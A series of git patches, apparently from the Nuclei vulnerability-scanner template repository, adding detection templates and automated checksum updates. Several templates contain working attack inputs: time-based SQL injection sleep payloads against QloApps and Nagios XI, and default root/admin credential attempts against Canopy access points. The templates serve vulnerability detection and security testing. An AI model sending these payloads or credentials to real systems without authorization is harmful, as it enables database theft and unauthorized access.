'http/misconfiguration/installer/phpmyfaq-installer.yaml' - 'http/misconfiguration/installer/trilium-notes-installer.yaml' - 'http/misconfiguration/unigui-server-monitor-exposure.yaml' From f00b1585d1ae24b5d5218af3163a7237927bac7d Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Wed, 22 May 2024 09:14:25 +0000 Subject: [PATCH 1174/1768] Auto Generated Templates Checksum [Wed May 22 09:14:25 UTC 2024] :robot: --- templates-checksum.txt | 6 ++++-- 1 file changed, 4 insertions(+), 2 deletions(-) diff --git a/templates-checksum.txt b/templates-checksum.txt index 74d33e9f3b..1837b6bd63 100644 --- a/templates-checksum.txt +++ b/templates-checksum.txt @@ -5440,7 +5440,9 @@ http/misconfiguration/installer/netsparker-enterprise-installer.yaml:87452a1aa53 http/misconfiguration/installer/nginx-auto-installer.yaml:ad565c9eee92dff96cc6487522724d96386339d9 http/misconfiguration/installer/nodebb-installer.yaml:ed1f90625817f7ea87343d84d727f642283a21d8 http/misconfiguration/installer/nopcommerce-installer.yaml:bfd555e9315506be53f26705388e2c20e2459d8a +http/misconfiguration/installer/octoprint-installer.yaml:d5fdda436ae9b456dca704c3a61af9cf9cd1d64d http/misconfiguration/installer/ojs-installer.yaml:9db5a6615b0a8adb210daea73705dac97b071006 +http/misconfiguration/installer/openfire-setup.yaml:283f6cdfa7c96e723575f73af2769a7a89b60b22 http/misconfiguration/installer/openmage-install.yaml:180e538959d9ad22f7f6c64648e8d392383334bc http/misconfiguration/installer/openshift-installer-panel.yaml:280afbeb89c73b3664bc5167fb4cafb15723d8d7 http/misconfiguration/installer/opensis-installer.yaml:8a0c4bf9bb56f866b4b4d3d0f4eb97837d4436fc @@ -6824,7 +6826,7 @@ http/technologies/maian-cart-detect.yaml:04535015f709d487931505967e5b18023229a19 http/technologies/mappproxy-detect.yaml:34f8715bb04d15e410646087f140852d5e67e6a4 http/technologies/matrix-detect.yaml:33b6e2aef92cf34e8fdfa015ed1d7c4cbb0c9ca7 http/technologies/matrix-homeserver-detect.yaml:03f44055b1385667e1d860c9160c9b0a3b5b24b0 -http/technologies/meilisearch-detect.yaml:ea0eed8f2dea564317914a7c34f7bf1b77dea059 +http/technologies/meilisearch-detect.yaml:a6496077c0c1e7d4dea5346d51d2f0863e8c0fa7 http/technologies/metatag-cms.yaml:dddeec9fe5817ce89ce12c7fb09e5702c6cf5ea7 http/technologies/microsoft/aspnet-version-detect.yaml:e37201ff3f26965873974a21c6bd351a7cbe851c http/technologies/microsoft/aspnetmvc-version-disclosure.yaml:8f445b5529fb0bb219994e249b2cc3aa4e868f97 @@ -8544,7 +8546,7 @@ ssl/tls-version.yaml:4e40f08efbb39172b9280ea9e26ca5f0a14a575a ssl/untrusted-root-certificate.yaml:a91d36990a1d052f5ee64d170ad8f084d38dab19 ssl/weak-cipher-suites.yaml:62fe808d9dfafda67c410e6cb9445fdc70257e89 ssl/wildcard-tls.yaml:d244f62c7bd22d3868fc6fc7cb9550af6b261210 -templates-checksum.txt:b5a0879341065078cca8089129c0afa0b34a7888 +templates-checksum.txt:74149f9f7f71c7586617faaea3dd7af8b393811d wappalyzer-mapping.yml:7f03bd65baacac20c1dc6bbf35ff2407959574f1 workflows/74cms-workflow.yaml:bb010e767ad32b906153e36ea618be545b4e22d0 workflows/acrolinx-workflow.yaml:8434089bb55dec3d7b2ebc6a6f340e73382dd0c4 From 10a7d03d00b8e7c77e78c613c96cbcbe5e3a89fe Mon Sep 17 00:00:00 2001 From: Ritik Chaddha <44563978+ritikchaddha@users.noreply.github.com> Date: Wed, 22 May 2024 14:45:27 +0530 Subject: [PATCH 1175/1768] Update microfocus-admin-server.yaml --- http/exposed-panels/microfocus-admin-server.yaml | 4 ++-- 1 file changed, 2 insertions(+), 2 deletions(-) diff --git a/http/exposed-panels/microfocus-admin-server.yaml b/http/exposed-panels/microfocus-admin-server.yaml index a3127e0a6b..3557a411ea 100644 --- a/http/exposed-panels/microfocus-admin-server.yaml +++ b/http/exposed-panels/microfocus-admin-server.yaml @@ -15,7 +15,7 @@ info: shodan-query: Micro Focus DSD vendor: microfocus verified: true - tags: panel,exposure,microfocus,admin + tags: panel,microfocus,detect,login http: - method: GET @@ -43,4 +43,4 @@ http: group: 1 regex: - '(?i)Micro\s+Focus\s+Open\s+Enterprise\s+Server\s+([A-Z0-9\s]+)' - - '(?i)Copyright\s+([0-9]+)\s+Micro\s+Focus' \ No newline at end of file + - '(?i)Copyright\s+([0-9]+)\s+Micro\s+Focus' From bd3a07b1b90c082acbcedd36d9aa0d9c04184496 Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Wed, 22 May 2024 09:15:32 +0000 Subject: [PATCH 1176/1768] Auto Template Signing [Wed May 22 09:15:32 UTC 2024] :robot: --- http/misconfiguration/installer/openfire-setup.yaml | 1 + 1 file changed, 1 insertion(+) diff --git a/http/misconfiguration/installer/openfire-setup.yaml b/http/misconfiguration/installer/openfire-setup.yaml index 95d42298c4..7faa03f883 100644 --- a/http/misconfiguration/installer/openfire-setup.yaml +++ b/http/misconfiguration/installer/openfire-setup.yaml @@ -27,3 +27,4 @@ http: - type: status status: - 200 +# digest: 4b0a00483046022100a68bc4f64b5ec3c6e043e4a1a8a390420071a630f2e8087fb59307318c89f5a0022100fb3328364ce4f7475942c690242c28b8f478a14766ae5e66aa040fc8656d5a77:922c64590222798bb761d5b6d8e72950 \ No newline at end of file From 072dca5b5ebc7ee2c50717d08883c0f5e02ee197 Mon Sep 17 00:00:00 2001 From: "[PDBot]" Date: Wed, 22 May 2024 09:15:53 +0000 Subject: [PATCH 1177/1768] Auto Generated New Template Addition List [Wed May 22 09:15:53 UTC 2024] :robot: --- .new-additions | 2 ++ 1 file changed, 2 insertions(+) diff --git a/.new-additions b/.new-additions index dbd9859d6e..994432f283 100644 --- a/.new-additions +++ b/.new-additions @@ -32,9 +32,11 @@ http/misconfiguration/installer/easy-viserlabs-installer.yaml http/misconfiguration/installer/froxlor-installer.yaml http/misconfiguration/installer/ids-skills-installer.yaml http/misconfiguration/installer/moosocial-installer.yaml +http/misconfiguration/installer/octoprint-installer.yaml http/misconfiguration/installer/openfire-setup.yaml http/misconfiguration/installer/phpmyfaq-installer.yaml http/misconfiguration/installer/trilium-notes-installer.yaml +http/misconfiguration/installer/xbackbone-installer.yaml http/misconfiguration/unigui-server-monitor-exposure.yaml http/technologies/apache/apache-answer-detect.yaml http/technologies/boa-web-server.yaml From 7d942aae58e3d4ae4b34bb4909d1443e1a499c28 Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Wed, 22 May 2024 09:16:03 +0000 Subject: [PATCH 1178/1768] Auto Generated Templates Checksum [Wed May 22 09:16:03 UTC 2024] :robot: --- templates-checksum.txt | 3 ++- 1 file changed, 2 insertions(+), 1 deletion(-) diff --git a/templates-checksum.txt b/templates-checksum.txt index 1837b6bd63..6da2281537 100644 --- a/templates-checksum.txt +++ b/templates-checksum.txt @@ -5495,6 +5495,7 @@ http/misconfiguration/installer/webtrees-install.yaml:373a89cc6c65f6d44a4b7fd764 http/misconfiguration/installer/webuzo-installer.yaml:dc4d1a58f425cb8fb42cbc5280cc2ab9cbbb991d http/misconfiguration/installer/wowcms-installer.yaml:6df79c7601fd21994a52333494a91a3d653f0573 http/misconfiguration/installer/wp-install.yaml:f09020cd3e1b61762935c650fe0ba42d659657e9 +http/misconfiguration/installer/xbackbone-installer.yaml:30b17b879c64fc395e02e5ba500170c6b381672d http/misconfiguration/installer/yzmcms-installer.yaml:cfd51c27e2bd7ce0dad274cf7d3d8a81519f6d74 http/misconfiguration/installer/zabbix-installer.yaml:c68f624b2a0260aff9280223ed8559ed9438a1b9 http/misconfiguration/installer/zencart-installer.yaml:4b3f6cc0c7a3fdf855d63035860f48020f1c602a @@ -8546,7 +8547,7 @@ ssl/tls-version.yaml:4e40f08efbb39172b9280ea9e26ca5f0a14a575a ssl/untrusted-root-certificate.yaml:a91d36990a1d052f5ee64d170ad8f084d38dab19 ssl/weak-cipher-suites.yaml:62fe808d9dfafda67c410e6cb9445fdc70257e89 ssl/wildcard-tls.yaml:d244f62c7bd22d3868fc6fc7cb9550af6b261210 -templates-checksum.txt:74149f9f7f71c7586617faaea3dd7af8b393811d +templates-checksum.txt:edbf51a3019bb4b115206be60f9fc068771f1242 wappalyzer-mapping.yml:7f03bd65baacac20c1dc6bbf35ff2407959574f1 workflows/74cms-workflow.yaml:bb010e767ad32b906153e36ea618be545b4e22d0 workflows/acrolinx-workflow.yaml:8434089bb55dec3d7b2ebc6a6f340e73382dd0c4 From be26b91616e1502a50712eeb7c531c5b3f6ed081 Mon Sep 17 00:00:00 2001 From: "[PDBot]" Date: Wed, 22 May 2024 09:16:40 +0000 Subject: [PATCH 1179/1768] Syncing Templates --- .github/workflows/templates-sync.yml | 2 ++ 1 file changed, 2 insertions(+) diff --git a/.github/workflows/templates-sync.yml b/.github/workflows/templates-sync.yml index 122254169b..2546fae73c 100644 --- a/.github/workflows/templates-sync.yml +++ b/.github/workflows/templates-sync.yml @@ -37,9 +37,11 @@ on: - 'http/misconfiguration/installer/froxlor-installer.yaml' - 'http/misconfiguration/installer/ids-skills-installer.yaml' - 'http/misconfiguration/installer/moosocial-installer.yaml' + - 'http/misconfiguration/installer/octoprint-installer.yaml' - 'http/misconfiguration/installer/openfire-setup.yaml' - 'http/misconfiguration/installer/phpmyfaq-installer.yaml' - 'http/misconfiguration/installer/trilium-notes-installer.yaml' + - 'http/misconfiguration/installer/xbackbone-installer.yaml' - 'http/misconfiguration/unigui-server-monitor-exposure.yaml' - 'http/technologies/apache/apache-answer-detect.yaml' - 'http/technologies/boa-web-server.yaml' From 1879b270e460198aa9a951f516cd34df3e1294fc Mon Sep 17 00:00:00 2001 From: Ritik Chaddha <44563978+ritikchaddha@users.noreply.github.com> Date: Wed, 22 May 2024 14:47:11 +0530 Subject: [PATCH 1180/1768] updated format --- http/technologies/devexpress-detect.yaml | 11 ++++++----- 1 file changed, 6 insertions(+), 5 deletions(-) diff --git a/http/technologies/devexpress-detect.yaml b/http/technologies/devexpress-detect.yaml index deef82eabf..7ad3dcfc73 100644 --- a/http/technologies/devexpress-detect.yaml +++ b/http/technologies/devexpress-detect.yaml @@ -1,16 +1,17 @@ id: devexpress-detect info: - name: DevExpress Detect + name: DevExpress - Detect author: CravateRouge severity: info - metadata: - max-request: 1 - shodan-query: html:"DXR.axd" - description: "Detect DevExpress based on existence of its HTTP handler for serving images, scripts and other resources to the client side" + description: | + Detect DevExpress based on the existence of its HTTP handler for serving images, scripts, and other resources to the client side. reference: - https://github.com/DevExpress/aspnet-security-bestpractices/blob/master/SecurityBestPractices.WebForms/README.md#53-information-exposure-through-source-code - https://supportcenter.devexpress.com/ticket/details/q311748/dxr-axd-what-is-it-and-how-to-disable-it + metadata: + max-request: 1 + shodan-query: html:"DXR.axd" tags: devexpress,iis,microsoft,asp,tech http: From c7799ea833b6e829863148170ae79cff97f6a01f Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Wed, 22 May 2024 09:18:42 +0000 Subject: [PATCH 1182/1768] Auto Generated Templates Checksum [Wed May 22 09:18:42 UTC 2024] :robot: --- templates-checksum.txt | 6 +++--- 1 file changed, 3 insertions(+), 3 deletions(-) diff --git a/templates-checksum.txt b/templates-checksum.txt index 6da2281537..369c13b33a 100644 --- a/templates-checksum.txt +++ b/templates-checksum.txt @@ -4053,7 +4053,7 @@ http/exposed-panels/metasploit-panel.yaml:35d1b6eb3b01af19738d113656574141b5de32 http/exposed-panels/metasploit-setup-page.yaml:b80a5e11ce34feedcc9992dc5e48f4dbf72f3a3d http/exposed-panels/metersphere-login.yaml:2a3e8e8fbd941752330c0c3b4330cd4b0ff2a058 http/exposed-panels/mfiles-web-detect.yaml:68378a6fd15f922fb744e6ee1dc06dbd49fd543b -http/exposed-panels/microfocus-admin-server.yaml:00599e41ed1d3fc84e5841f8a4bf52118c9a200a +http/exposed-panels/microfocus-admin-server.yaml:a9b19236d2d61852079741c8757e75f08d10e371 http/exposed-panels/microfocus-filr-panel.yaml:ca84f4e319c1d7abad31589ff6634365744a3242 http/exposed-panels/microfocus-vibe-panel.yaml:d911b51310fcb45341a2a1bba8817ac270ebb08b http/exposed-panels/microsoft-exchange-panel.yaml:11adf54da092d2e63804541767f06224a830c4a4 @@ -5442,7 +5442,7 @@ http/misconfiguration/installer/nodebb-installer.yaml:ed1f90625817f7ea87343d84d7 http/misconfiguration/installer/nopcommerce-installer.yaml:bfd555e9315506be53f26705388e2c20e2459d8a http/misconfiguration/installer/octoprint-installer.yaml:d5fdda436ae9b456dca704c3a61af9cf9cd1d64d http/misconfiguration/installer/ojs-installer.yaml:9db5a6615b0a8adb210daea73705dac97b071006 -http/misconfiguration/installer/openfire-setup.yaml:283f6cdfa7c96e723575f73af2769a7a89b60b22 +http/misconfiguration/installer/openfire-setup.yaml:a297d11c8460758d07481671287ba0d2e41026d0 http/misconfiguration/installer/openmage-install.yaml:180e538959d9ad22f7f6c64648e8d392383334bc http/misconfiguration/installer/openshift-installer-panel.yaml:280afbeb89c73b3664bc5167fb4cafb15723d8d7 http/misconfiguration/installer/opensis-installer.yaml:8a0c4bf9bb56f866b4b4d3d0f4eb97837d4436fc @@ -8547,7 +8547,7 @@ ssl/tls-version.yaml:4e40f08efbb39172b9280ea9e26ca5f0a14a575a ssl/untrusted-root-certificate.yaml:a91d36990a1d052f5ee64d170ad8f084d38dab19 ssl/weak-cipher-suites.yaml:62fe808d9dfafda67c410e6cb9445fdc70257e89 ssl/wildcard-tls.yaml:d244f62c7bd22d3868fc6fc7cb9550af6b261210 -templates-checksum.txt:edbf51a3019bb4b115206be60f9fc068771f1242 +templates-checksum.txt:5ebd9a60f10091bce3c5b24480eef01e46262b22 wappalyzer-mapping.yml:7f03bd65baacac20c1dc6bbf35ff2407959574f1 workflows/74cms-workflow.yaml:bb010e767ad32b906153e36ea618be545b4e22d0 workflows/acrolinx-workflow.yaml:8434089bb55dec3d7b2ebc6a6f340e73382dd0c4 From aed0b26a6c409e5c07fc9400c580a9a1775da657 Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Wed, 22 May 2024 09:20:25 +0000 Subject: [PATCH 1183/1768] Auto Template Signing [Wed May 22 09:20:25 UTC 2024] :robot: --- http/exposed-panels/microfocus-admin-server.yaml | 1 + http/misconfiguration/installer/octoprint-installer.yaml | 1 + http/misconfiguration/installer/xbackbone-installer.yaml | 1 + 3 files changed, 3 insertions(+) diff --git a/http/exposed-panels/microfocus-admin-server.yaml b/http/exposed-panels/microfocus-admin-server.yaml index 3557a411ea..ebfc273cf2 100644 --- a/http/exposed-panels/microfocus-admin-server.yaml +++ b/http/exposed-panels/microfocus-admin-server.yaml @@ -44,3 +44,4 @@ http: regex: - '(?i)Micro\s+Focus\s+Open\s+Enterprise\s+Server\s+([A-Z0-9\s]+)' - '(?i)Copyright\s+([0-9]+)\s+Micro\s+Focus' +# digest: 4a0a004730450221008e8de980426ff5dfbe891462f66adba778378809ee555a753acd392e6e42f3120220736941a25c53cc07f48d8b31ded16956e7272d61407784ebd5b6faf86d43a70c:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/misconfiguration/installer/octoprint-installer.yaml b/http/misconfiguration/installer/octoprint-installer.yaml index e21886aefa..5a90a95d62 100644 --- a/http/misconfiguration/installer/octoprint-installer.yaml +++ b/http/misconfiguration/installer/octoprint-installer.yaml @@ -27,3 +27,4 @@ http: - type: status status: - 200 +# digest: 4a0a0047304502201afe0cd54faef3001ad0a7ff031eaefe958735bf100c5b0f1ff3c3bb837d705802210086f5f4d06e62171a2fa10da2112156e9d0f32dcd0588ad65211fa80ffa994799:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/misconfiguration/installer/xbackbone-installer.yaml b/http/misconfiguration/installer/xbackbone-installer.yaml index fa5217e3ca..df0f9b4ee9 100644 --- a/http/misconfiguration/installer/xbackbone-installer.yaml +++ b/http/misconfiguration/installer/xbackbone-installer.yaml @@ -27,3 +27,4 @@ http: - type: status status: - 200 +# digest: 4a0a00473045022100d5682a4b684ba38ddfddbd20405302b95efee06045bd008d6fb666491c1c299a022066a7ab62467668cd36862cb21035bf3b5d3762b126e37c784dd0a594b056b3e9:922c64590222798bb761d5b6d8e72950 \ No newline at end of file From 9574cf4068f1b90c1b3c764e1dd832b0d38155e2 Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Wed, 22 May 2024 09:20:46 +0000 Subject: [PATCH 1185/1768] Auto Generated Templates Checksum [Wed May 22 09:20:46 UTC 2024] :robot: --- templates-checksum.txt | 4 ++-- 1 file changed, 2 insertions(+), 2 deletions(-) diff --git a/templates-checksum.txt b/templates-checksum.txt index 369c13b33a..38fe9b1856 100644 --- a/templates-checksum.txt +++ b/templates-checksum.txt @@ -6705,7 +6705,7 @@ http/technologies/dell/dell-idrac7-detect.yaml:60e624f4f081e596c1ae1292ea18f99d7 http/technologies/dell/dell-idrac8-detect.yaml:1dff3a1be021d38ea8846d6151c920edbf995f3e http/technologies/dell/dell-idrac9-detect.yaml:44da5eecdb4a220ccde1aecdd8c801986a988367 http/technologies/detect-sentry.yaml:f4f51185253e23a6e3db1f4bbcb1a37bebf4da1a -http/technologies/devexpress-detect.yaml:6a5327a8a84357f2e365da16936697859e0f6020 +http/technologies/devexpress-detect.yaml:62dc0662669d161ebe6dd65e01b544f9a393965a http/technologies/directus-detect.yaml:cfea1a80217c3f05df1da02ecd2cf60e988699d5 http/technologies/dreambox-detect.yaml:35362632d9ed50a1e5b4513bfc5a09543c63e431 http/technologies/drupal-detect.yaml:5c269fdf58cf085a8ac062b1f23cd8b3a0ef7f99 @@ -8547,7 +8547,7 @@ ssl/tls-version.yaml:4e40f08efbb39172b9280ea9e26ca5f0a14a575a ssl/untrusted-root-certificate.yaml:a91d36990a1d052f5ee64d170ad8f084d38dab19 ssl/weak-cipher-suites.yaml:62fe808d9dfafda67c410e6cb9445fdc70257e89 ssl/wildcard-tls.yaml:d244f62c7bd22d3868fc6fc7cb9550af6b261210 -templates-checksum.txt:5ebd9a60f10091bce3c5b24480eef01e46262b22 +templates-checksum.txt:7ee13e971e67779248aab896dc65a9e8aa6433b2 wappalyzer-mapping.yml:7f03bd65baacac20c1dc6bbf35ff2407959574f1 workflows/74cms-workflow.yaml:bb010e767ad32b906153e36ea618be545b4e22d0 workflows/acrolinx-workflow.yaml:8434089bb55dec3d7b2ebc6a6f340e73382dd0c4 From 7f92771a6dbff236b0a332dfe643534a966d1326 Mon Sep 17 00:00:00 2001 From: Bradley D Date: Wed, 22 May 2024 07:02:38 -0600 Subject: [PATCH 1186/1768] Added canopy-access-point-default-login.yaml This template will detect canopy access points that allow the default login --- .../canopy-access-point-default-login.yaml | 43 +++++++++++++++++++ 1 file changed, 43 insertions(+) create mode 100644 http/default-logins/cambium-networks/canopy-access-point-default-login.yaml diff --git a/http/default-logins/cambium-networks/canopy-access-point-default-login.yaml b/http/default-logins/cambium-networks/canopy-access-point-default-login.yaml new file mode 100644 index 0000000000..61eae66bb8 --- /dev/null +++ b/http/default-logins/cambium-networks/canopy-access-point-default-login.yaml @@ -0,0 +1,43 @@ +id: cambium-networks-canopy-access-point-default-login + +info: + name: Canopy 5.7GHz Access Point - Default Login + author: defektive + severity: high + description: | + Cambium Networks / Motorola Canopy 5750AP ADVANTAGE Access Point 5.7GHz login credentials were discovered. + # metadata: + # verified: true + # max-request: 1 + # fofa-query: title="Welcome to Canopy" + tags: default-login,cambium-networks,5750AP + +http: + - raw: + - | + POST /login.cgi HTTP/1.1 + Host: {{Hostname}} + Content-Type: application/x-www-form-urlencoded + + &Session=0&CanopyUsername={{username}}&CanopyPassword={{password}}&login=Login&webguisubmit=submit + + attack: pitchfork + payloads: + username: + - root + - admin + password: + - root + - admin + matchers-condition: and + matchers: + + - type: word + part: body + words: + - "Logged in as root" + condition: and + + - type: status + status: + - 200 From 4446b0e219be864c3cc10fc29cb38578af962277 Mon Sep 17 00:00:00 2001 From: isikabdullah44 <108897267+isikabdullah44@users.noreply.github.com> Date: Wed, 22 May 2024 21:05:24 +0000 Subject: [PATCH 1187/1768] adds template to detect bitvise service --- network/detection/bitvise-detect.yaml | 35 +++++++++++++++++++++++++++ 1 file changed, 35 insertions(+) create mode 100644 network/detection/bitvise-detect.yaml diff --git a/network/detection/bitvise-detect.yaml b/network/detection/bitvise-detect.yaml new file mode 100644 index 0000000000..59125af37c --- /dev/null +++ b/network/detection/bitvise-detect.yaml @@ -0,0 +1,35 @@ +id: bitvise-detect + +info: + name: Bitvise Service - Detect + author: abdullahisik + severity: info + description: | + Bitvise service was detected. + reference: + - https://www.bitvise.com/ + - https://vulners.com/openvas/OPENVAS:1361412562310813387 + + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N + cwe-id: CWE-200 + cpe: cpe:/a:bitvise:winsshd + metadata: + shodan-query: product:"bitvise" + max-request: 1 + tags: seclists,network,ssh,bitvise,detect + +tcp: + - host: + - "{{Hostname}}" + port: 22 + + matchers: + - type: regex + regex: + - '(?i)Bitvise' + + extractors: + - type: regex + regex: + - "SSH-([0-9.]+)-([0-9.]+) .*" From dd32cc42116755696dbf8342959ffe02261923ab Mon Sep 17 00:00:00 2001 From: Ritik Chaddha <44563978+ritikchaddha@users.noreply.github.com> Date: Thu, 23 May 2024 09:05:54 +0530 Subject: [PATCH 1188/1768] Create qloapps-installer.yaml --- .../installer/qloapps-installer.yaml | 32 +++++++++++++++++++ 1 file changed, 32 insertions(+) create mode 100644 http/misconfiguration/installer/qloapps-installer.yaml diff --git a/http/misconfiguration/installer/qloapps-installer.yaml b/http/misconfiguration/installer/qloapps-installer.yaml new file mode 100644 index 0000000000..87064f012c --- /dev/null +++ b/http/misconfiguration/installer/qloapps-installer.yaml @@ -0,0 +1,32 @@ +id: qloapps-installer + +info: + name: QloApps - Installation + author: ritikchaddha + severity: high + description: | + QloApps Installation Assistant panel exposure. + metadata: + verified: true + max-request: 1 + fofa-query: title="QloApps Installation" + tags: install,qloapps,misconfig,exposure + +http: + - method: GET + path: + - "{{BaseURL}}/install/" + + host-redirects: true + max-redirects: 2 + matchers-condition: and + matchers: + - type: word + part: body + words: + - "QloApps Installation" + case-insensitive: true + + - type: status + status: + - 200 From 03b5315e5511084f21c5f98a7838eb46a2897dd6 Mon Sep 17 00:00:00 2001 From: Ritik Chaddha <44563978+ritikchaddha@users.noreply.github.com> Date: Thu, 23 May 2024 09:39:31 +0530 Subject: [PATCH 1189/1768] Create CVE-2023-36284.yaml --- http/cves/CVE-2023-36284.yaml | 59 +++++++++++++++++++++++++++++++++++ 1 file changed, 59 insertions(+) create mode 100644 http/cves/CVE-2023-36284.yaml diff --git a/http/cves/CVE-2023-36284.yaml b/http/cves/CVE-2023-36284.yaml new file mode 100644 index 0000000000..92667d236c --- /dev/null +++ b/http/cves/CVE-2023-36284.yaml @@ -0,0 +1,59 @@ +id: CVE-2023-36284 + +info: + name: QloApps 1.6.0 - SQL Injection + author: ritikchaddha + severity: high + description: | + An unauthenticated Time-Based SQL injection found in Webkul QloApps 1.6.0 via GET parameters date_from, date_to, and id_product allows a remote attacker to retrieve the contents of an entire database. + impact: | + Successful exploitation could lead to unauthorized access to sensitive data. + remediation: | + Apply the vendor-supplied patch or upgrade to a non-vulnerable version. + reference: + - https://flashy-lemonade-192.notion.site/Time-Based-SQL-injection-in-QloApps-1-6-0-be3ed1bdaf784a77b45dc6898a2de17e + - https://nvd.nist.gov/vuln/detail/CVE-2023-36284 + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N + cvss-score: 7.5 + cve-id: CVE-2023-36284 + cwe-id: CWE-89 + epss-score: 0.00061 + epss-percentile: 0.24798 + cpe: cpe:2.3:a:webkul:qloapps:1.6.0:*:*:*:*:*:*:* + metadata: + max-request: 1 + verified: true + vendor: webkul + product: qloapps + fofa-query: title="QloApps" + tags: cve,cve2023,qloapps,sqli + +flow: http(1) && http(2) + +http: + - raw: + - | + GET / HTTP/2 + Host: {{Hostname}} + + matchers: + - type: word + part: body + internal: true + words: + - "QloApps" + case-insensitive: true + + - raw: + - | + @timeout: 20s + GET /quick-order?date_from=2023-06-12%2000:00:00&date_to=2023-06-13%2000:00:00&deleteFromOrderLine=1&id_product=(select(0)from(select(sleep(5)))v) HTTP/2 + Host: {{Hostname}} + + matchers: + - type: dsl + dsl: + - duration>=5 + - 'contains(body, "<span>Guest Information")' + condition: and From a16b4473ea6491716bebfd163be2c01e8af5b780 Mon Sep 17 00:00:00 2001 From: Ritik Chaddha <44563978+ritikchaddha@users.noreply.github.com> Date: Thu, 23 May 2024 10:16:59 +0530 Subject: [PATCH 1190/1768] Create CVE-2023-48084.yaml --- http/cves/2023/CVE-2023-48084.yaml | 70 ++++++++++++++++++++++++++++++ 1 file changed, 70 insertions(+) create mode 100644 http/cves/2023/CVE-2023-48084.yaml diff --git a/http/cves/2023/CVE-2023-48084.yaml b/http/cves/2023/CVE-2023-48084.yaml new file mode 100644 index 0000000000..5c4c293207 --- /dev/null +++ b/http/cves/2023/CVE-2023-48084.yaml @@ -0,0 +1,70 @@ +id: CVE-2023-48084 + +info: + name: Nagios XI < 5.11.3 - SQL Injection + author: ritikchaddha + severity: critical + description: | + SQL injection vulnerability in Nagios XI before version 5.11.3 via the bulk modification tool. + impact: | + Successful exploitation could lead to unauthorized access to sensitive information. + remediation: | + Apply the vendor-supplied patch or upgrade to a non-vulnerable version. + reference: + - https://github.com/bucketcat/CVE-2023-48084 + - https://github.com/Hamibubu/CVE-2023-48084 + - https://nvd.nist.gov/vuln/detail/CVE-2023-48084 + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H + cvss-score: 9.8 + cve-id: CVE-2023-48084 + cwe-id: CWE-89 + epss-score: 0.00114 + epss-percentile: 0.44333 + cpe: cpe:2.3:a:nagios:nagios_xi:*:*:*:*:*:*:*:* + metadata: + max-request: 3 + verified: true + vendor: nagios + product: nagios_xi + fofa-query: title="Nagios XI" + tags: cve,cve2023,nagiosxi,sqli,authenticated + +http: + - raw: + - | + GET /nagiosxi/login.php HTTP/1.1 + Host: {{Hostname}} + + - | + POST /nagiosxi/login.php HTTP/1.1 + Host: {{Hostname}} + Content-Type: application/x-www-form-urlencoded + + nsp={{nsp}}&page=auth&debug=&pageopt=login&username={{username}}&password={{password}}&loginButton= + + - | + @timeout: 15s + GET /nagiosxi/index.php/admin/banner_message-ajaxhelper.php?action=acknowledge_banner_message&id=(SELECT+CASE+WHEN+1=1+THEN+sleep(5)+ELSE+sleep(0)+END+) HTTP/1.1 + Host: {{Hostname}} + + host-redirects: true + max-redirects: 2 + + skip-variables-check: true + matchers-condition: and + matchers: + - type: dsl + dsl: + - 'duration_3>=5' + - 'contains(body_3, "Home Dashboard</a>")' + condition: and + + extractors: + - type: regex + name: nsp + part: body + group: 1 + regex: + - 'name="nsp" value="(.*)">' + internal: true From 32e75ffaeccf9e60d4fe7975882598ef46f983aa Mon Sep 17 00:00:00 2001 From: Ritik Chaddha <44563978+ritikchaddha@users.noreply.github.com> Date: Thu, 23 May 2024 10:17:38 +0530 Subject: [PATCH 1191/1768] Rename http/cves/CVE-2023-36284.yaml to http/cves/2023/CVE-2023-36284.yaml --- http/cves/{ => 2023}/CVE-2023-36284.yaml | 0 1 file changed, 0 insertions(+), 0 deletions(-) rename http/cves/{ => 2023}/CVE-2023-36284.yaml (100%) diff --git a/http/cves/CVE-2023-36284.yaml b/http/cves/2023/CVE-2023-36284.yaml similarity index 100% rename from http/cves/CVE-2023-36284.yaml rename to http/cves/2023/CVE-2023-36284.yaml From c4d207d5dda8744eb86cd79c0f1f80a264f2261a Mon Sep 17 00:00:00 2001 From: Dhiyaneshwaran <leedhiyanesh@gmail.com> Date: Thu, 23 May 2024 10:36:34 +0530 Subject: [PATCH 1192/1768] minor update --- ...n.yaml => cambium-networks-default-login.yaml} | 15 ++++++++------- 1 file changed, 8 insertions(+), 7 deletions(-) rename http/default-logins/cambium-networks/{canopy-access-point-default-login.yaml => cambium-networks-default-login.yaml} (80%) diff --git a/http/default-logins/cambium-networks/canopy-access-point-default-login.yaml b/http/default-logins/cambium-networks/cambium-networks-default-login.yaml similarity index 80% rename from http/default-logins/cambium-networks/canopy-access-point-default-login.yaml rename to http/default-logins/cambium-networks/cambium-networks-default-login.yaml index 61eae66bb8..8e8af91d8d 100644 --- a/http/default-logins/cambium-networks/canopy-access-point-default-login.yaml +++ b/http/default-logins/cambium-networks/cambium-networks-default-login.yaml @@ -1,4 +1,4 @@ -id: cambium-networks-canopy-access-point-default-login +id: cambium-networks-default-login info: name: Canopy 5.7GHz Access Point - Default Login @@ -6,11 +6,11 @@ info: severity: high description: | Cambium Networks / Motorola Canopy 5750AP ADVANTAGE Access Point 5.7GHz login credentials were discovered. - # metadata: - # verified: true - # max-request: 1 - # fofa-query: title="Welcome to Canopy" - tags: default-login,cambium-networks,5750AP + metadata: + verified: true + max-request: 1 + fofa-query: title="Welcome to Canopy" + tags: default-login,cambium-networks http: - raw: @@ -29,9 +29,10 @@ http: password: - root - admin + + stop-at-first-match: true matchers-condition: and matchers: - - type: word part: body words: From b291eb6a48931af752540beb9c1ca6a5e2f5a625 Mon Sep 17 00:00:00 2001 From: Dhiyaneshwaran <leedhiyanesh@gmail.com> Date: Thu, 23 May 2024 10:40:40 +0530 Subject: [PATCH 1193/1768] minor update --- http/cves/2022/CVE-2022-1580.yaml | 4 ++-- 1 file changed, 2 insertions(+), 2 deletions(-) diff --git a/http/cves/2022/CVE-2022-1580.yaml 